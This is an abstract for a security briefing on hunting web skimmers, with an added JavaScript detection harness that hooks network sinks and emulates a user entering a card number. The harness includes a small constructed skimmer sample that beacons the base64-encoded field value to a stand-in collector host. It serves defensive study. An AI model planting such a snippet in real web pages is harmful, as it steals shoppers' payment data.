
Hunting Web Skimmers: Past, Present and Future

  • 16:20
  • Tue
  • 14 Nov
Briefing Stage 4


Web skimming attacks have become a significant threat to web security, leading to the interception of sensitive user data and financial information. Notably, these attacks have resulted in highly publicized incidents such as British Airways, Newegg, and TicketMaster, affecting hundreds of thousands of victims. As the frequency of such attacks continues to escalate, web skimmers are becoming increasingly adaptable, constantly evolving their techniques to evade various forms of detection. In response to this dynamic landscape, our presentation explores our past methodologies, ongoing innovations, and future prospects for combating these threats.

In the past, our web skimming detection relied on probe filtering and manually created YARA rules. Our approach effectively identified various web skimmer families, yielding significant findings including the exposure of some high-profile cases involving a prominent e-commerce website in Central and Eastern European markets. However, the relentless evolution of web skimmers has rendered traditional YARA rules insufficient.

In the present, our response has evolved. We've embraced advanced static methods and innovative dynamic emulation and hooking techniques to detect web skimmers and intercept their exfiltration gates. Our dynamic emulation engine closely mimics user interactions, triggering malicious web skimmer behaviors that remain latent within standard dynamic detection environments.
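The idea of hooking network sinks and emulating input can be sketched as follows. This is an added example, not the presenters' engine: the stand-in page environment, the host names, the canary value and the two sample scripts are all constructed assumptions.

```javascript
// Added example: all names, hosts and the card number below are constructed.
const CANARY = "4111111111111111";                 // test value typed into the field
const ALLOWED_HOSTS = new Set(["shop.example", "payments.example"]);
// Plain, base64 (padding stripped) and hex forms of the canary to search for.
function canaryForms(value) {
  const buf = Buffer.from(value, "utf8");
  return [value, buf.toString("base64").replace(/=+$/, ""), buf.toString("hex")];
}
const safeDecode = (s) => { try { return decodeURIComponent(s); } catch { return s; } };

// Wrap the network sinks so every call is inspected before it is passed on.
function instrument(env, findings) {
  const forms = canaryForms(CANARY);
  const check = (sink, url, body) => {
    const host = new URL(url, "https://shop.example/").hostname;
    const data = safeDecode(`${url} ${body ?? ""}`);
    const leaked = forms.some((f) => data.includes(f));
    if (leaked && !ALLOWED_HOSTS.has(host)) findings.push({ sink, host });
  };
  const origFetch = env.fetch, origBeacon = env.navigator.sendBeacon;
  env.fetch = (url, opts = {}) => { check("fetch", url, opts.body); return origFetch(url, opts); };
  env.navigator.sendBeacon = (url, body) => { check("sendBeacon", url, body); return origBeacon(url, body); };
}

// Minimal stand-in for a page: one input field and stubbed network calls.
function makeEnv() {
  const listeners = [];
  return {
    field: { value: "", addEventListener: (_type, fn) => listeners.push(fn) },
    fetch: async () => ({ ok: true }),             // nothing leaves the harness
    navigator: { sendBeacon: () => true },
    type(v) { this.field.value = v; listeners.forEach((fn) => fn()); },
  };
}

// Load the script, then emulate the user typing; report what fired and when.
function scan(pageScript) {
  const env = makeEnv(), findings = [];
  instrument(env, findings);
  pageScript(env);
  const beforeInput = findings.length;             // passive load only
  env.type(CANARY);                                // emulated interaction
  return { beforeInput, findings };
}

// Constructed samples: a first-party checkout and a script posting elsewhere.
const benign = (env) => env.field.addEventListener("change", () =>
  env.fetch("https://payments.example/charge", { method: "POST", body: env.field.value }));
const suspicious = (env) => env.field.addEventListener("change", () =>
  env.navigator.sendBeacon("https://collector.example/g?d=" + Buffer.from(env.field.value).toString("base64")));
```

Scanning the second sample reports nothing at load time and one finding after the emulated input, which is the latent behaviour a passive crawl would miss.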

In anticipation of forthcoming challenges, we investigate the role of Machine Learning (ML) and Large Language Models (LLMs) in our advanced defense strategies. Our exploration covers anomaly detection and the potential of pattern recognition, as well as insights into using LLMs against evolving web skimming tactics.